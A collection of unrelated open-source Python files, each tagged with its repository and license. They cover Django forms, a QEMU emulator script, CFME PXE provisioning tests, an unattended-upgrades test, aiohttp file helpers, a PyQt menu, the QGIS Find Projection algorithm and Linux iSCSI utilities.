        self.helper = SubmitCancelFormHelper(
            self, cancel_href="{% url 'community_users' community.slug %}")

    def save(self):
        """Update the groups of which the user is member of"""
        # Form values arrive as strings; compare primary keys as ints.
        group_pks = [int(pk) for pk in self.cleaned_data['groups']]
        # Leave any group that was unchecked...
        for member_group in self.member_groups:
            if member_group.pk not in group_pks:
                self.user.leave_group(member_group)
        # ...and join any checked group the user is not yet a member of.
        for pk in group_pks:
            group = Group.objects.get(pk=pk)
            if not self.user.is_group_member(group.name):
                self.user.join_group(group)
| exploreshaifali/portal | systers_portal/community/forms.py | Python | gpl-2.0 | 3,969 |
#!/usr/bin/env python
import os, Queue
import sys
from time import sleep
from threading import Thread
from libs.qemu import QemuInstance, UARTLineParser
# External
# Optional CLI argument: a path whose directory is added to sys.path so the
# emulated firmware's modules can be imported.
if len(sys.argv) > 1:
    print "ARGS:", str(sys.argv)
    sys.path.append(os.path.dirname( sys.argv[1] ))
########################################################################
print("=== Starting RPiEmu v0.5 ===")
# Qemu python wrapper that connects to the TCP server
rpi = QemuInstance()
rpi.start()
#####################################################
# Imported here (after the sys.path tweak above) so the models resolve.
from models.totumduino import TotumDuino
from models.fabtotum import FABTotum
# FABTotum model
ft = FABTotum()
# Totumduino model
td = TotumDuino(ft)
# Start a TD thread
td.run()
print("* Totumduino thread started")
# UART line parser
# Each parsed UART line is handed to the Totumduino model's UART0 transfer.
parser = UARTLineParser(qemu=rpi, line_handler=td.uart0_transfer)
parser.start()
parser.loop()
# Finish the TD thread
td.finish()
| Colibri-Embedded/FABEmu | examples/rpiemu.py | Python | gpl-2.0 | 909 |
# -*- coding: utf-8 -*-
import fauxfactory
import pytest
from widgetastic.utils import partial_match
from cfme import test_requirements
from cfme.infrastructure.provider import InfraProvider
from cfme.infrastructure.provider.rhevm import RHEVMProvider
from cfme.infrastructure.pxe import get_pxe_server_from_config, get_template_from_config
from cfme.services.service_catalogs import ServiceCatalogs
from cfme.utils import testgen
from cfme.utils.blockers import BZ
from cfme.utils.conf import cfme_data
from cfme.utils.generators import random_vm_name
from cfme.utils.log import logger
# Module-wide pytest marks: require the automate server role, ensure infra
# providers are set up, tag as a service requirement at tier 2.
pytestmark = [
    pytest.mark.meta(server_roles="+automate"),
    pytest.mark.usefixtures('uses_infra_providers'),
    test_requirements.service,
    pytest.mark.tier(2)
]
def pytest_generate_tests(metafunc):
    """Parametrize tests with infra providers that carry full PXE data.

    A provider is kept only when: it is not SCVMM, its configured PXE
    server is one of the known PXE servers, and its kickstart template
    exists in ``cfme_data['customization_templates']``.
    """
    # Filter out providers without provisioning data or hosts defined
    argnames, argvalues, idlist = testgen.providers_by_class(
        metafunc, [InfraProvider], required_fields=[
            ['provisioning', 'pxe_server'],
            ['provisioning', 'pxe_image'],
            ['provisioning', 'pxe_image_type'],
            ['provisioning', 'pxe_kickstart'],
            ['provisioning', 'pxe_template'],
            ['provisioning', 'datastore'],
            ['provisioning', 'host'],
            ['provisioning', 'pxe_root_password'],
            ['provisioning', 'vlan']
        ])
    # Only the PXE server names are needed here; the argnames/ids returned
    # by pxe_servers() are unused.
    _, pargvalues, _ = testgen.pxe_servers(metafunc)
    pxe_server_names = [pval[0] for pval in pargvalues]
    new_idlist = []
    new_argvalues = []
    for i, argvalue_tuple in enumerate(argvalues):
        args = dict(zip(argnames, argvalue_tuple))
        # SCVMM does not support PXE provisioning in these tests.
        if args['provider'].type == "scvmm":
            continue
        pxe_server_name = args['provider'].data['provisioning']['pxe_server']
        if pxe_server_name not in pxe_server_names:
            continue
        pxe_cust_template = args['provider'].data['provisioning']['pxe_kickstart']
        # Membership test works directly on the dict; .keys() is redundant.
        if pxe_cust_template not in cfme_data.get('customization_templates', {}):
            continue
        new_idlist.append(idlist[i])
        new_argvalues.append(argvalues[i])
    testgen.parametrize(metafunc, argnames, new_argvalues, ids=new_idlist, scope="module")
@pytest.fixture(scope='module')
def pxe_server(appliance, provider):
    """PXE server object built from this provider's provisioning config."""
    server_name = provider.data['provisioning']['pxe_server']
    return get_pxe_server_from_config(server_name, appliance=appliance)
@pytest.fixture(scope='module')
def pxe_cust_template(appliance, provider):
    """Kickstart customization template object, created if missing."""
    template_name = provider.data['provisioning']['pxe_kickstart']
    return get_template_from_config(template_name, create=True, appliance=appliance)
@pytest.fixture(scope="function")
def setup_pxe_servers_vm_prov(pxe_server, pxe_cust_template, provisioning):
    """Ensure the PXE server exists in CFME and exposes the image type
    required for VM provisioning."""
    if not pxe_server.exists():
        pxe_server.create()
    pxe_server.set_pxe_image_type(provisioning['pxe_image'], provisioning['pxe_image_type'])
@pytest.fixture(scope="function")
def catalog_item(appliance, provider, dialog, catalog, provisioning,
                 setup_pxe_servers_vm_prov):
    """Create and return a service catalog item that PXE-provisions a VM.

    All provisioning values come from the provider's ``provisioning``
    config section; pytest_generate_tests guarantees they are present.
    """
    # generate_tests makes sure these have values
    pxe_template, host, datastore, pxe_server, pxe_image, pxe_kickstart, pxe_root_password,\
        pxe_image_type, pxe_vlan = map(
            provisioning.get, (
                'pxe_template', 'host', 'datastore', 'pxe_server', 'pxe_image', 'pxe_kickstart',
                'pxe_root_password', 'pxe_image_type', 'vlan'
            )
        )
    provisioning_data = {
        'catalog': {'catalog_name': {'name': pxe_template, 'provider': provider.name},
                    'provision_type': 'PXE',
                    'pxe_server': pxe_server,
                    'pxe_image': {'name': pxe_image},
                    'vm_name': random_vm_name('pxe_service')},
        'environment': {'datastore_name': {'name': datastore},
                        'host_name': {'name': host}},
        'customize': {'root_password': pxe_root_password,
                      'custom_template': {'name': pxe_kickstart}},
        # partial_match: the configured vlan may be only a prefix of the
        # value shown in the UI.
        'network': {'vlan': partial_match(pxe_vlan)},
    }
    item_name = fauxfactory.gen_alphanumeric()
    return appliance.collections.catalog_items.create(
        provider.catalog_item_type,
        name=item_name,
        description="my catalog", display_in=True, catalog=catalog,
        dialog=dialog, prov_data=provisioning_data)
@pytest.mark.rhv1
@pytest.mark.meta(blockers=[BZ(1633540, forced_streams=['5.10'],
                               unblock=lambda provider: not provider.one_of(RHEVMProvider)),
                            BZ(1633516, forced_streams=['5.10'],
                               unblock=lambda provider: not provider.one_of(RHEVMProvider))])
@pytest.mark.usefixtures('setup_pxe_servers_vm_prov')
def test_pxe_servicecatalog(appliance, setup_provider, provider, catalog_item, request):
    """Tests RHEV PXE service catalog

    Orders the PXE catalog item and waits (up to an hour) for the
    provision request to succeed; the provisioned VM is removed from the
    provider by the finalizer.

    Metadata:
        test_flag: pxe, provision
    """
    vm_name = catalog_item.prov_data['catalog']["vm_name"]
    # CFME appends a "0001" suffix to the requested VM name.
    request.addfinalizer(
        lambda: appliance.collections.infra_vms.instantiate(
            "{}0001".format(vm_name), provider).cleanup_on_provider()
    )
    service_catalogs = ServiceCatalogs(appliance, catalog_item.catalog, catalog_item.name)
    service_catalogs.order()
    # nav to requests page happens on successful provision
    logger.info('Waiting for cfme provision request for service %s', catalog_item.name)
    request_description = catalog_item.name
    provision_request = appliance.collections.requests.instantiate(request_description,
                                                                   partial_check=True)
    provision_request.wait_for_request(num_sec=3600)
    msg = "Provisioning failed with the message {}".format(provision_request.rest.message)
    assert provision_request.is_succeeded(), msg
| anurag03/integration_tests | cfme/tests/services/test_pxe_service_catalogs.py | Python | gpl-2.0 | 5,998 |
#!/usr/bin/python
import apt_pkg
import logging
import os
import mock
import sys
import tempfile
import unittest
sys.path.insert(0, "..")
from unattended_upgrade import _setup_logging
class MockOptions:
    """Minimal stand-in for the parsed unattended-upgrades CLI options."""
    debug = False
    dry_run = False
class TestLogdir(unittest.TestCase):
    """Tests for the log-directory handling of unattended_upgrade._setup_logging."""

    def setUp(self):
        # Fresh temp dir per test; apt_pkg.init() must run before
        # apt_pkg.config can be read or written.
        self.tempdir = tempfile.mkdtemp()
        apt_pkg.init()
        self.mock_options = MockOptions()

    def test_logdir(self):
        # test log
        logdir = os.path.join(self.tempdir, "mylog")
        apt_pkg.config.set("Unattended-Upgrade::LogDir", logdir)
        # Drop existing handlers so _setup_logging re-creates the log file.
        logging.root.handlers = []
        _setup_logging(self.mock_options)
        self.assertTrue(os.path.exists(logdir))

    def test_logdir_depreated(self):
        # NOTE(review): method name has a typo ("depreated"); kept unchanged
        # because renaming would alter the test identifier.
        # test if the deprecated APT::UnattendedUpgrades dir is not used
        # if the new Unattended-Upgrade::LogDir is given
        logdir = os.path.join(self.tempdir, "mylog-use")
        logdir2 = os.path.join(self.tempdir, "mylog-dontuse")
        apt_pkg.config.set("Unattended-Upgrade::LogDir", logdir)
        apt_pkg.config.set("APT::UnattendedUpgrades::LogDir", logdir2)
        logging.root.handlers = []
        _setup_logging(self.mock_options)
        self.assertTrue(os.path.exists(logdir))
        self.assertFalse(os.path.exists(logdir2))
if __name__ == "__main__":
    # Verbose logging makes failures easier to diagnose when run directly.
    logging.basicConfig(level=logging.DEBUG)
    unittest.main()
| Jimdo/unattended-upgrades | test/test_logdir.py | Python | gpl-2.0 | 1,396 |
import os
import re
import mimetypes
from collections import namedtuple
from aiohttp import web
from app.lib.helpers import (
http400,
http404,
)
DEFAULT_CONTENT_TYPE = 'application/octet-stream'
# Stored files are named "<numeric id>_<name>.<format>".
FILENAME_PARSER = re.compile(r"(?P<id>\d+)_(?P<name>.+)\.(?P<format>.+)")
ParsedFile = namedtuple('ParsedFile', [
    'original_name', 'id', 'name'
])


def parse_filename(filename: str):
    """Split a stored filename of the form "<id>_<name>.<format>".

    Returns a ParsedFile(original_name, id, name) on success, or None
    when *filename* is empty/None or does not match the pattern.
    """
    match = FILENAME_PARSER.match(filename) if filename else None
    if match is None:
        return None
    file_id = match.group('id')
    stem = match.group('name')
    extension = match.group('format')
    return ParsedFile(
        original_name="{}_{}.{}".format(file_id, stem, extension),
        id=file_id,
        name="{}.{}".format(stem, extension),
    )
def get_cache_headers():
    """Headers that mark a response as cacheable for one year."""
    headers = {}
    headers["Cache-Control"] = "public, max-age=31536000"
    headers["Etag"] = "'CacheForever'"
    headers["Last-Modified"] = "Wed, 21 Oct 2015 07:28:00 GMT"
    return headers
def get_no_cache_headers():
    """Headers that forbid any client or proxy caching."""
    headers = {}
    headers["Cache-Control"] = "no-store, no-cache, max-age=0"
    headers["Pragma"] = "no-cache"
    return headers
def get_file_headers(file_name):
    """Build download headers (Content-Type / Content-Disposition) for a file.

    The content type is guessed from the file extension.  Previously a
    failed guess was str-formatted into the literal string "None"; it now
    falls back to the generic binary type instead.
    """
    content_type, _ = mimetypes.guess_type(file_name)
    if content_type is None:
        # mimetypes.guess_type returns (None, None) for unknown extensions;
        # keep in sync with the module-level DEFAULT_CONTENT_TYPE constant.
        content_type = 'application/octet-stream'
    return {
        "Content-Type": content_type,
        "Content-Disposition": 'attachment;filename="{}"'.format(file_name),
    }
def get_non_cached_file_headers(file_name):
    """Download headers for *file_name* with caching explicitly disabled."""
    return {**get_file_headers(file_name), **get_no_cache_headers()}
def get_cached_file_headers(file_name):
    """Download headers for *file_name* marked cacheable for a year."""
    return {**get_file_headers(file_name), **get_cache_headers()}
def allowed_file(filename):
    """Return True when *filename* has a whitelisted image extension.

    Fixes the original membership test, which wrapped the extension list
    in a set literal (``{[...]}``) and therefore raised TypeError (a list
    is unhashable) for every filename containing a dot.
    """
    if '.' not in filename:
        return False
    extension = filename.rsplit('.', 1)[1]
    # NOTE(review): comparison is case-sensitive, so "PIC.PNG" is rejected;
    # lowercase the extension here if that is not intended.
    return extension in {
        'bmp', 'eps', 'icns', 'im', 'msp', 'pcx', 'ppm',
        'png', 'tiff', 'ico', 'jpg', 'jpeg', 'gif',
    }
def file_response(name, body, source):
    """Wrap *body* bytes in an aiohttp response with download headers.

    Returns a 404 response when *body* is None.  The X-File-Source header
    records where the bytes came from (value of *source*).
    """
    if body is None:
        return http404()
    return web.Response(
        body=body,
        headers={
            'X-File-Source': source,
            **get_file_headers(name)
        }
    )
async def store_mp3_handler(request):
    """aiohttp handler that streams one multipart upload part to /media/.

    NOTE(review): despite the name, allowed_file() only accepts image
    extensions, so mp3 uploads are rejected with 400 — confirm intent.
    """
    reader = await request.multipart()
    # /!\ Don't forget to validate your inputs /!\
    file = await reader.next()
    filename = file.filename
    if not allowed_file(filename):
        return http400()
    # You cannot rely on Content-Length if transfer is chunked.
    size = 0
    # NOTE(review): filename comes straight from the client and is not
    # sanitized against path separators before being joined to /media/.
    with open(os.path.join('/media/', filename), 'wb') as f:
        while True:
            chunk = await file.read_chunk()  # 8192 bytes by default.
            if not chunk:
                break
            size += len(chunk)
            f.write(chunk)
    return web.Response(
        text='{} sized of {} successfully stored'.format(filename, size)
    )
| cpwr/mediasite | app/lib/file.py | Python | gpl-2.0 | 2,779 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
from gui.dwidgets import DMenu
class SettingsMenu(DMenu):
    """Application settings menu.

    The menu tree is declared as data (self.menuItems) and materialized by
    DMenu.creatMenus(); each entry's 'trigger' names the action attribute
    ('<trigger>Action') that DMenu creates on this object.
    """

    def __init__(self, parent=None):
        super(SettingsMenu, self).__init__(parent)
        self.parent = parent
        # 'type': 'submenu' nests a list of child actions; 'checkable'
        # entries behave like radio buttons (see updateChecked).
        self.menuItems = [
            {
                'name': self.tr('Login'),
                'icon': u'',
                'shortcut': u'',
                'trigger': 'Login',
            },
            {
                'name': self.tr('Show suspension window'),
                'icon': u'',
                'shortcut': u'',
                'trigger': 'Suspension',
            },
            {
                'name': self.tr('Show float window'),
                'icon': u'',
                'shortcut': u'',
                'trigger': 'Float',
            },
            {
                'name': self.tr('Show Dock window'),
                'icon': u'',
                'shortcut': u'',
                'trigger': 'Dock',
            },
            {
                'name': self.tr('Language'),
                'trigger': 'Language',
                'type': 'submenu',
                'actions': [
                    {
                        'name': 'English',
                        'icon': u'',
                        'shortcut': u'',
                        'trigger': 'English',
                        "checkable": True
                    },
                    {
                        'name': 'Chinese',
                        'icon': u'',
                        'shortcut': u'',
                        'trigger': 'Chinese',
                        "checkable": True
                    },
                ]
            },
            {
                'name': self.tr('Document'),
                'trigger': 'Document',
                'type': 'submenu',
                'actions': [
                    {
                        'name': 'Android developer guide',
                        'icon': u'',
                        'shortcut': u'',
                        'trigger': 'AndroidDeveloper',
                        "checkable": False
                    },
                    {
                        'name': 'iOS developer guide',
                        'icon': u'',
                        'shortcut': u'',
                        'trigger': 'IOSDeveloper',
                        "checkable": False
                    },
                    {
                        'name': 'Ford developer center',
                        'icon': u'',
                        'shortcut': u'',
                        'trigger': 'FordDeveloper',
                        "checkable": False
                    },
                ]
            },
            {
                'name': self.tr('ObjectView'),
                'icon': u'',
                'shortcut': u'',
                'trigger': 'ObjectView',
            },
            {
                'name': self.tr('About'),
                'icon': u'',
                'shortcut': u'Qt.Key_F12',
                'trigger': 'About',
            },
            {
                'name': self.tr('Exit'),
                'icon': u'',
                'shortcut': u'',
                'trigger': 'Exit',
            },
        ]
        self.creatMenus(self.menuItems)
        self.initConnect()
        # English is the default UI language.
        getattr(self, '%sAction' % 'English').setChecked(True)

    def initConnect(self):
        # Language actions form an exclusive group (see updateChecked).
        for item in ['English', 'Chinese']:
            getattr(self, '%sAction' % item).triggered.connect(self.updateChecked)

    def updateChecked(self):
        # Emulate QActionGroup exclusivity: only the action that emitted
        # the signal stays checked.
        for item in ['English', 'Chinese']:
            action = getattr(self, '%sAction' % item)
            if self.sender() is action:
                action.setChecked(True)
            else:
                action.setChecked(False)
| dragondjf/musicplayer | gui/menus/settingsmenu.py | Python | gpl-2.0 | 3,819 |
# -*- coding: utf-8 -*-
"""
***************************************************************************
FindProjection.py
-----------------
Date : February 2017
Copyright : (C) 2017 by Nyall Dawson
Email : nyall dot dawson at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Nyall Dawson'
__date__ = 'February 2017'
__copyright__ = '(C) 2017, Nyall Dawson'
import os
from qgis.core import (QgsGeometry,
QgsFeature,
QgsFeatureSink,
QgsField,
QgsFields,
QgsCoordinateReferenceSystem,
QgsCoordinateTransform,
QgsCoordinateTransformContext,
QgsWkbTypes,
QgsProcessingException,
QgsProcessingParameterFeatureSource,
QgsProcessingParameterExtent,
QgsProcessingParameterCrs,
QgsProcessingParameterFeatureSink,
QgsProcessingParameterDefinition)
from qgis.PyQt.QtCore import QVariant
from processing.algs.qgis.QgisAlgorithm import QgisAlgorithm
pluginPath = os.path.split(os.path.split(os.path.dirname(__file__))[0])[0]
class FindProjection(QgisAlgorithm):
    """Brute-force CRS finder.

    Tries every known CRS and reports those under which the input layer's
    extent, reprojected to the target-area CRS, intersects the target area.
    """

    INPUT = 'INPUT'
    TARGET_AREA = 'TARGET_AREA'
    TARGET_AREA_CRS = 'TARGET_AREA_CRS'
    OUTPUT = 'OUTPUT'

    def tags(self):
        return self.tr('crs,srs,coordinate,reference,system,guess,estimate,finder,determine').split(',')

    def group(self):
        return self.tr('Vector general')

    def groupId(self):
        return 'vectorgeneral'

    def __init__(self):
        super().__init__()

    def initAlgorithm(self, config=None):
        self.addParameter(QgsProcessingParameterFeatureSource(self.INPUT,
                                                              self.tr('Input layer')))
        extent_parameter = QgsProcessingParameterExtent(self.TARGET_AREA,
                                                        self.tr('Target area for layer'))
        self.addParameter(extent_parameter)
        # deprecated: kept (hidden) for backward compatibility; the extent
        # parameter now carries its own CRS.
        crs_param = QgsProcessingParameterCrs(self.TARGET_AREA_CRS, 'Target area CRS', optional=True)
        crs_param.setFlags(crs_param.flags() | QgsProcessingParameterDefinition.FlagHidden)
        self.addParameter(crs_param)
        self.addParameter(QgsProcessingParameterFeatureSink(self.OUTPUT,
                                                            self.tr('CRS candidates')))

    def name(self):
        return 'findprojection'

    def displayName(self):
        return self.tr('Find projection')

    def processAlgorithm(self, parameters, context, feedback):
        source = self.parameterAsSource(parameters, self.INPUT, context)
        if source is None:
            raise QgsProcessingException(self.invalidSourceError(parameters, self.INPUT))
        extent = self.parameterAsExtent(parameters, self.TARGET_AREA, context)
        target_crs = self.parameterAsExtentCrs(parameters, self.TARGET_AREA, context)
        # The deprecated explicit CRS parameter still wins when supplied.
        if self.TARGET_AREA_CRS in parameters:
            c = self.parameterAsCrs(parameters, self.TARGET_AREA_CRS, context)
            if c.isValid():
                target_crs = c
        target_geom = QgsGeometry.fromRect(extent)
        # Output table has a single attribute: the candidate authority id.
        fields = QgsFields()
        fields.append(QgsField('auth_id', QVariant.String, '', 20))
        (sink, dest_id) = self.parameterAsSink(parameters, self.OUTPUT, context,
                                               fields, QgsWkbTypes.NoGeometry, QgsCoordinateReferenceSystem())
        if sink is None:
            raise QgsProcessingException(self.invalidSinkError(parameters, self.OUTPUT))
        # make intersection tests nice and fast
        engine = QgsGeometry.createGeometryEngine(target_geom.constGet())
        engine.prepareGeometry()
        layer_bounds = QgsGeometry.fromRect(source.sourceExtent())
        crses_to_check = QgsCoordinateReferenceSystem.validSrsIds()
        total = 100.0 / len(crses_to_check)
        found_results = 0
        transform_context = QgsCoordinateTransformContext()
        for current, srs_id in enumerate(crses_to_check):
            if feedback.isCanceled():
                break
            candidate_crs = QgsCoordinateReferenceSystem.fromSrsId(srs_id)
            if not candidate_crs.isValid():
                continue
            # Ballpark transforms are fine here — only a rough overlap test
            # is needed, and fallback handlers would slow the scan down.
            transform_candidate = QgsCoordinateTransform(candidate_crs, target_crs, transform_context)
            transform_candidate.setBallparkTransformsAreAppropriate(True)
            transform_candidate.disableFallbackOperationHandler(True)
            transformed_bounds = QgsGeometry(layer_bounds)
            try:
                if not transformed_bounds.transform(transform_candidate) == 0:
                    continue
            # NOTE(review): bare except — any transform failure just skips
            # the candidate; narrowing to QgsCsException would be cleaner.
            except:
                continue
            try:
                if engine.intersects(transformed_bounds.constGet()):
                    feedback.pushInfo(self.tr('Found candidate CRS: {}').format(candidate_crs.authid()))
                    f = QgsFeature(fields)
                    f.setAttributes([candidate_crs.authid()])
                    sink.addFeature(f, QgsFeatureSink.FastInsert)
                    found_results += 1
            except:
                continue
            feedback.setProgress(int(current * total))
        if found_results == 0:
            feedback.reportError(self.tr('No matching projections found'))
        return {self.OUTPUT: dest_id}
| lbartoletti/QGIS | python/plugins/processing/algs/qgis/FindProjection.py | Python | gpl-2.0 | 6,167 |
"""
Basic iscsi support for Linux host with the help of commands
iscsiadm and tgtadm.
This include the basic operates such as login and get device name by
target name. And it can support the real iscsi access and emulated
iscsi in localhost then access it.
"""
import re
import os
import logging
from avocado.core import exceptions
from avocado.utils import data_factory
from avocado.utils import process
from avocado.utils import path
from . import utils_selinux
from . import utils_net
from . import data_dir
ISCSI_CONFIG_FILE = "/etc/iscsi/initiatorname.iscsi"
def iscsi_get_sessions():
    """Return a list of (portal, target) tuples for active iSCSI sessions."""
    output = process.system_output("iscsiadm --mode session",
                                   ignore_status=True)
    if "No active sessions" in output:
        return []
    sessions = []
    for line in output.splitlines():
        fields = line.split()
        # fields[2] is "ip:port,tpgt"; keep only the "ip:port" part.
        sessions.append((fields[2].split(',')[0], fields[3]))
    return sessions
def iscsi_get_nodes():
    """Return (portal, target-iqn) tuples for every recorded iSCSI node."""
    output = process.system_output("iscsiadm --mode node",
                                   ignore_status=True)
    if "No records found" in output:
        return []
    # Portal is a dotted IPv4 address or a bracketed IPv6 address.
    return re.findall(
        r"(\d+\.\d+\.\d+\.\d+|\[.+\]):\d+,\d+\s+([\w\.\-:\d]+)", output)
def iscsi_login(target_name, portal):
    """Log in to *target_name* through *portal*.

    :param target_name: Name of the target
    :params portal: Hostname/Ip for iscsi server
    :return: the target name on success, otherwise an empty string.
    """
    cmd = ("iscsiadm --mode node --login --targetname %s --portal %s"
           % (target_name, portal))
    output = process.system_output(cmd)
    return target_name if "successful" in output else ""
def iscsi_node_del(target_name=None):
    """
    Delete target node record, if the target name is not set then delete
    all target node records.

    :params target_name: Name of the target.
    """
    node_list = iscsi_get_nodes()
    # cmd doubles as a "found a matching record" sentinel below.
    cmd = ''
    if target_name:
        for node_tup in node_list:
            if target_name in node_tup:
                cmd = "iscsiadm -m node -o delete -T %s " % target_name
                cmd += "--portal %s" % node_tup[0]
                process.system(cmd, ignore_status=True)
                # Only the first matching record is removed.
                break
        if not cmd:
            logging.error("The target '%s' for delete is not in target node"
                          " record", target_name)
    else:
        # No target given: wipe every recorded node.
        for node_tup in node_list:
            cmd = "iscsiadm -m node -o delete -T %s " % node_tup[1]
            cmd += "--portal %s" % node_tup[0]
            process.system(cmd, ignore_status=True)
def iscsi_logout(target_name=None):
    """Log out of *target_name*, or of all targets when it is None.

    :params target_name: Name of the target.
    :return: the target name when the logout reported success, else "".
    """
    if target_name:
        cmd = "iscsiadm --mode node --logout -T %s" % target_name
    else:
        cmd = "iscsiadm --mode node --logout all"
    if "successful" in process.system_output(cmd):
        return target_name
    return ""
def iscsi_discover(portal_ip):
    """Query *portal_ip* for exported targets.

    :param portal_ip: Ip for iscsi server
    :return: raw discovery output, or "" when the server reports Invalid.
    """
    output = process.system_output(
        "iscsiadm -m discovery -t sendtargets -p %s" % portal_ip,
        ignore_status=True)
    if "Invalid" in output:
        logging.debug(output)
        return ""
    return output
class _IscsiComm(object):
    """
    Provide an interface to complete the similar initialization

    Shared base for the TGT and LIO backends: session/portal checks,
    initiator-name management, login/logout and cleanup.
    """

    def __init__(self, params, root_dir):
        """
        common __init__ function used to initialize iSCSI service

        :param params: parameters dict for iSCSI
        :param root_dir: path for image
        """
        self.target = params.get("target")
        self.export_flag = False
        self.luns = None
        self.restart_tgtd = 'yes' == params.get("restart_tgtd", "no")
        if params.get("portal_ip"):
            self.portal_ip = params.get("portal_ip")
        else:
            self.portal_ip = "127.0.0.1"
        # Unique suffix used when backing up the initiator config file.
        if params.get("iscsi_thread_id"):
            self.id = params.get("iscsi_thread_id")
        else:
            self.id = data_factory.generate_random_string(4)
        self.initiator = params.get("initiator")
        # CHAP AUTHENTICATION
        self.chap_flag = False
        self.chap_user = params.get("chap_user")
        self.chap_passwd = params.get("chap_passwd")
        if self.chap_user and self.chap_passwd:
            self.chap_flag = True
        if params.get("emulated_image"):
            # Emulated device: a local file exported as the backing store.
            self.initiator = None
            emulated_image = params.get("emulated_image")
            self.emulated_image = os.path.join(root_dir, emulated_image)
            self.device = "device.%s" % os.path.basename(self.emulated_image)
            self.emulated_id = ""
            self.emulated_size = params.get("image_size")
            self.unit = self.emulated_size[-1].upper()
            self.emulated_size = self.emulated_size[:-1]
            # maps K,M,G,T => (count, bs)
            emulated_size = {'K': (1, 1),
                             'M': (1, 1024),
                             'G': (1024, 1024),
                             'T': (1024, 1048576),
                             }
            # NOTE(review): dict.has_key() is Python 2 only.
            if emulated_size.has_key(self.unit):
                block_size = emulated_size[self.unit][1]
                size = int(self.emulated_size) * emulated_size[self.unit][0]
                # Expected image size in KiB, used to detect stale images.
                self.emulated_expect_size = block_size * size
                self.create_cmd = ("dd if=/dev/zero of=%s count=%s bs=%sK"
                                   % (self.emulated_image, size, block_size))
        else:
            self.device = None

    def logged_in(self):
        """
        Check if the session is login or not.
        """
        sessions = iscsi_get_sessions()
        login = False
        # sessions is a list of (portal, target) tuples.
        if self.target in map(lambda x: x[1], sessions):
            login = True
        return login

    def portal_visible(self):
        """
        Check if the portal can be found or not.
        """
        return bool(re.findall("%s$" % self.target,
                               iscsi_discover(self.portal_ip), re.M))

    def set_initiatorName(self, id, name):
        """
        back up and set up the InitiatorName

        The existing config file is moved aside with an *-<id>* suffix so
        cleanup() can restore it later.
        """
        if os.path.isfile("%s" % ISCSI_CONFIG_FILE):
            logging.debug("Try to update iscsi initiatorname")
            cmd = "mv %s %s-%s" % (ISCSI_CONFIG_FILE, ISCSI_CONFIG_FILE, id)
            process.system(cmd)
            fd = open(ISCSI_CONFIG_FILE, 'w')
            fd.write("InitiatorName=%s" % name)
            fd.close()
            # iscsid must be restarted to pick up the new initiator name.
            process.system("service iscsid restart")

    def login(self):
        """
        Login session for both real iscsi device and emulated iscsi.
        Include env check and setup.
        """
        login_flag = False
        if self.portal_visible():
            login_flag = True
        elif self.initiator:
            self.set_initiatorName(id=self.id, name=self.initiator)
            if self.portal_visible():
                login_flag = True
        elif self.emulated_image:
            self.export_target()
            # If both iSCSI server and iSCSI client are on localhost.
            # It's necessary to set up the InitiatorName.
            if "127.0.0.1" in self.portal_ip:
                self.set_initiatorName(id=self.id, name=self.target)
            if self.portal_visible():
                login_flag = True
        if login_flag:
            iscsi_login(self.target, self.portal_ip)

    def get_device_name(self):
        """
        Get device name from the target name.

        Returns "/dev/<disk>" for the logged-in target, or "" on failure.
        """
        cmd = "iscsiadm -m session -P 3"
        device_name = ""
        if self.logged_in():
            output = process.system_output(cmd)
            pattern = r"Target:\s+%s.*?disk\s(\w+)\s+\S+\srunning" % self.target
            device_name = re.findall(pattern, output, re.S)
            try:
                device_name = "/dev/%s" % device_name[0]
            except IndexError:
                logging.error(
                    "Can not find target '%s' after login.", self.target)
        else:
            logging.error("Session is not logged in yet.")
        return device_name

    def set_chap_auth_initiator(self):
        """
        Set CHAP authentication for initiator.
        """
        name_dict = {'node.session.auth.authmethod': 'CHAP'}
        name_dict['node.session.auth.username'] = self.chap_user
        name_dict['node.session.auth.password'] = self.chap_passwd
        for name in name_dict.keys():
            cmd = "iscsiadm --mode node --targetname %s " % self.target
            cmd += "--op update --name %s --value %s" % (name, name_dict[name])
            try:
                process.system(cmd)
            except process.CmdError:
                logging.error("Fail to set CHAP authentication for initiator")

    def logout(self):
        """
        Logout from target.
        """
        if self.logged_in():
            iscsi_logout(self.target)

    def cleanup(self):
        """
        Clean up env after iscsi used.

        Logs out, removes node records, restores the backed-up initiator
        config and deletes the exported target if this object created it.
        """
        self.logout()
        iscsi_node_del(self.target)
        if os.path.isfile("%s-%s" % (ISCSI_CONFIG_FILE, self.id)):
            # Restore the original initiatorname file saved by
            # set_initiatorName() and restart iscsid to re-read it.
            cmd = "mv %s-%s %s" % (ISCSI_CONFIG_FILE, self.id, ISCSI_CONFIG_FILE)
            process.system(cmd)
            cmd = "service iscsid restart"
            process.system(cmd)
        if self.export_flag:
            self.delete_target()
class IscsiTGT(_IscsiComm):
    """
    iscsi support TGT backend used in RHEL6.

    NOTE(review): uses Python 2-only syntax (``except X, err``).
    """

    def __init__(self, params, root_dir):
        """
        initialize TGT backend for iSCSI

        :param params: parameters dict for TGT backend of iSCSI.
        """
        super(IscsiTGT, self).__init__(params, root_dir)

    def get_target_id(self):
        """
        Get target id from image name. Only works for emulated iscsi device
        """
        cmd = "tgtadm --lld iscsi --mode target --op show"
        target_info = process.system_output(cmd)
        target_id = ""
        # Remember the most recent "Target <N>" header; stop when a backing
        # store line mentions our image.  The for/else resets target_id when
        # the image was never found.
        for line in re.split("\n", target_info):
            if re.findall("Target\s+(\d+)", line):
                target_id = re.findall("Target\s+(\d+)", line)[0]
            if re.findall("Backing store path:\s+(/+.+)", line):
                if self.emulated_image in line:
                    break
        else:
            target_id = ""
        return target_id

    def get_chap_accounts(self):
        """
        Get all CHAP authentication accounts
        """
        cmd = "tgtadm --lld iscsi --op show --mode account"
        all_accounts = process.system_output(cmd)
        if all_accounts:
            # Skip the "Account list:" header line.
            all_accounts = map(str.strip, all_accounts.splitlines()[1:])
        return all_accounts

    def add_chap_account(self):
        """
        Add CHAP authentication account
        """
        try:
            cmd = "tgtadm --lld iscsi --op new --mode account"
            cmd += " --user %s" % self.chap_user
            cmd += " --password %s" % self.chap_passwd
            process.system(cmd)
        except process.CmdError, err:
            logging.error("Fail to add account: %s", err)
        # Check the new add account exist
        if self.chap_user not in self.get_chap_accounts():
            logging.error("Can't find account %s" % self.chap_user)

    def delete_chap_account(self):
        """
        Delete the CHAP authentication account
        """
